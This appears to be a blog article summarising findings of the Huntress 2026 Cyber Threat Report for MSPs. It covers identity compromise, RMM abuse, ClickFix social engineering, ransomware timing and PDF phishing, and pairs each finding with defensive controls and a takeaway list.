Huntress 2026 Cyber Threat Report: Key Findings for MSPs

Huntress published their 2026 Cyber Threat Report based on telemetry from more than 4.6 million endpoints and 9.4 million identities observed during 2025. The dataset is heavily weighted toward SMB environments and the MSP channel, which makes it directly relevant for teams managing client infrastructure at scale.

This article extracts the most operationally useful findings and maps them to concrete controls.

Identity compromise is the top threat vector

The shift is clear: initial access increasingly starts with user and identity compromise rather than traditional malware delivery. The report breaks identity-related threats into four main categories.

pie title "Identity Threat Categories"
  "Access Policy Violations" : 37.2
  "Mailbox Manipulation" : 19.0
  "AiTM Phishing" : 18.9
  "OAuth Abuse" : 10.1
  "Other" : 14.8

Access policy and trust boundary violations lead at 37.2%, covering conditional access failures, impossible travel detections, and credential reuse from breached databases.

Adversary-in-the-middle (AiTM) phishing at 18.9% is particularly concerning because it bypasses traditional MFA. Attackers proxy authentication sessions in real time, capturing both credentials and session tokens.

The identity compromise attack chain

These aren’t isolated events. The report documents a repeatable intrusion chain that progresses from initial credential access through to business impact.

graph TD
  A["Credential Theft<br/><small>Phishing / Infostealer / Breach</small>"] --> B["Initial Access<br/><small>Valid credentials used</small>"]
  B --> C{"MFA Enabled?"}
  C -->|No| D["Direct Mailbox Access"]
  C -->|Yes| E["AiTM Proxy<br/>OAuth Abuse"]
  E --> D
  D --> F["Mailbox Rule Creation<br/><small>Auto-forward / delete</small>"]
  F --> G["Business Email Compromise<br/><small>Invoice fraud / data theft</small>"]
  D --> H["Lateral Movement<br/><small>SharePoint / OneDrive</small>"]
  style A fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style B fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style C fill:#92400e,stroke:#78350f,color:#fef3c7
  style D fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style E fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style F fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style G fill:#5b21b6,stroke:#4c1d95,color:#ede9fe
  style H fill:#5b21b6,stroke:#4c1d95,color:#ede9fe

The key defensive takeaway: each stage of this chain offers a detection opportunity. Enforce conditional access with strict location and device constraints, alert on mailbox rule creation and hidden forwarding, and treat suspicious token reuse as an incident trigger, not low-priority noise.

RMM tools: the attacker’s favorite backdoor

Remote Monitoring and Management tool abuse appeared in roughly 1 in 4 incidents, a 277% increase from the previous year. At the same time, traditional offensive tooling categories declined.

The reason is straightforward: legitimate RMM software gives attackers everything they need without raising behavioral alarms.

• Built-in persistence mechanisms
• Interactive remote access
• Native command execution
• Low behavioral contrast versus normal IT activity

ClickFix: social engineering at 53% of malware delivery

The report attributes 53.2% of all malware loader activity to ClickFix variants. This is a fundamental shift in how initial payloads are delivered, and it displaces the old assumption that exploitation or malicious attachments are the primary loader mechanism.

pie title "Malware Loader Activity"
  "ClickFix Social Engineering" : 53.2
  "Other Loader Methods" : 46.8

The typical ClickFix pattern:

1. User encounters a fake verification prompt (CAPTCHA, browser update, document viewer)
2. The prompt instructs the user to open Run (Win+R) or Terminal and paste a command
3. The pasted command downloads and executes a payload under the user’s context

This bypasses email security entirely because the user manually initiates execution. Traditional email filtering, sandboxing, and attachment scanning do not catch it.

What to do about it: Add detections for browser-to-shell execution pivots, restrict script interpreter abuse (PowerShell, mshta.exe, wscript.exe) in user context where business processes allow, and update awareness programs to specifically cover command-execution scams, not just link and attachment phishing.

Ransomware: slower but still devastating

Ransomware accounts for about 5% of observed incidents, but the operational profile has changed. The median time-to-ransom increased from 17 to 20 hours.

Those extra 3 hours aren’t idle time. Operators are doing more credential work, reconnaissance, data exfiltration, and defense suppression before pulling the trigger on encryption. The silver lining: this creates a wider detection window if your telemetry and response processes are fast enough.

The report also shows operator concentration: Akira, Medusa, Qilin, and RansomHub represented a large share of observed ransomware operations in 2025.

Use the pre-encryption window for containment. Suspend risky identities quickly, isolate hosts showing credential-dump and lateral-movement sequences, and investigate archive/staging traffic before encryption events occur. Don’t anchor detection logic only on encryption artifacts.

Phishing: PDFs dominate

In the report’s phishing dataset, PDF was the dominant attachment type at 57.7%, far ahead of any other file format. PDFs are trusted, widely allowed through email filters, and can embed QR codes and redirect links that traditional URL scanning may miss.

Microsoft was the most impersonated brand at roughly 31.6% of phishing attempts, consistent with attackers targeting Microsoft 365 credentials as a gateway to the identity compromise chains described above.

The operational shift: phishing now frequently functions as the start of identity and session compromise chains rather than a standalone malware delivery event. Combine user reporting with automated mailbox telemetry analysis, and include post-click behavior monitoring in triage, not just message-level indicators.

Defense evasion and AI-enabled attacks

Two emerging patterns worth tracking:

Defense evasion is increasingly about gradual degradation rather than kill-switch actions. The report highlights BYOVD (Bring Your Own Vulnerable Driver) patterns, endpoint security tampering, and heavy use of PowerShell-based Defender manipulation. Mature operators add exclusions, change policies, and selectively disable telemetry, then execute later-stage actions once visibility drops. Monitor security policy drift as a first-class detection source.

AI-enabled abuse is maturing into workflow support for attackers. The report frames it as a productivity accelerator rather than a novel attack vector. Grammar and tone are no longer reliable indicators of a phishing attempt. Prioritize behavioral detections over content-quality heuristics, and validate requests through process controls rather than message style.

30-day implementation plan

Based on the report’s findings, here’s a prioritized 4-week action plan for SMB and MSP teams.

Key takeaways

• Identity is the primary attack surface. More than 85% of identity threats map to access policy violations, mailbox manipulation, AiTM, or OAuth abuse. Conditional access and consent policies are your first line of defense.
• RMM governance is non-negotiable. With 277% growth in RMM abuse, an explicit allowlist and first-seen alerting are high-impact, low-effort controls.
• ClickFix has displaced traditional loaders. Over half of malware delivery now relies on tricking users into executing commands. Update your awareness programs and detection rules accordingly.
• The pre-encryption window is your opportunity. A 20-hour median time-to-ransom means detection and containment can happen before data is encrypted, but only if your response process is fast enough.
• Defend against degradation, not just disruption. Attackers are incrementally weakening security controls before striking. Monitor policy drift as carefully as you monitor alerts.

What’s next

If you’re hardening your infrastructure alongside these security controls, these guides may help: